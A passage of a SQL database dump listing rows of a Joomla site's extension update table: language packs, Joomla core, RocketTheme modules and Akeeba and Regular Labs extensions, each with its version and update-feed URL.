Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16503,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16504,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16505,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16506,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16507,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16508,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16509,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16510,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16511,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16512,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16513,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16514,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16515,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16516,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16517,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(16518,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(16519,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(16520,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(16521,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(16522,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(16523,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(16524,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(16525,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16526,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16527,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16528,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16529,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16530,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16531,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16532,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(16533,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16534,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16535,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16536,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16537,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16538,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16539,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16540,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16541,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16542,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16543,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16544,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(16545,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(16546,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(16547,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(16548,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(16549,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(16550,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(16551,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(16552,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(16553,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(16554,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(16555,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(16556,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16557,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16558,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16559,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16560,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16561,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16562,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16563,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16564,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16565,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16566,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16567,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16568,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16569,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16570,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16571,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16572,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16573,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16574,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.12','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-12.html\n				',''),(16575,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(16576,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-4.html\n				',''),(16577,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16578,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16579,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16580,3,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16581,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16582,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16583,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16584,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16585,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(16586,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16587,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16588,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16589,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16590,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16591,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16592,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16593,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16594,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16595,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16596,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16597,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(16598,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(16599,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(16600,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(16601,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(16602,3,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(16603,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(16604,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(16605,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(16606,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(16607,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(16608,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(16609,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16610,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16611,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16612,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16613,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16614,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16615,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16616,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16617,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16618,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16619,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16620,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16621,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16622,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16623,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16624,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16625,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16626,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16627,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16628,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(16629,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(16630,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(16631,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(16632,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(16633,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(16634,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(16635,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(16636,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16637,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16638,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16639,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16640,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16641,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16642,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16643,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(16644,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16645,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16646,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16647,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16648,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16649,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16650,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16651,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16652,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16653,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16654,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16655,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(16656,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(16657,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(16658,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(16659,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(16660,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(16661,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(16662,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(16663,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(16664,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(16665,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(16666,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(16667,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16668,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16669,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16670,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16671,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16672,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16673,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16674,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16675,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16676,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16677,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16678,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16679,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16680,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16681,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16682,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16683,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16684,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16685,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-0.html',''),(16686,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(16687,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(16688,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.6.0','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-0.html',''),(16689,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16690,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16691,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.2.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-0.html',''),(16692,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16693,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16694,3,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16695,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16696,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16697,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16698,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16699,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(16700,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16701,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16702,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16703,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16704,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16705,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16706,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16707,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16708,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16709,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16710,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16711,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(16712,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(16713,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(16714,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(16715,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(16716,3,0,'English 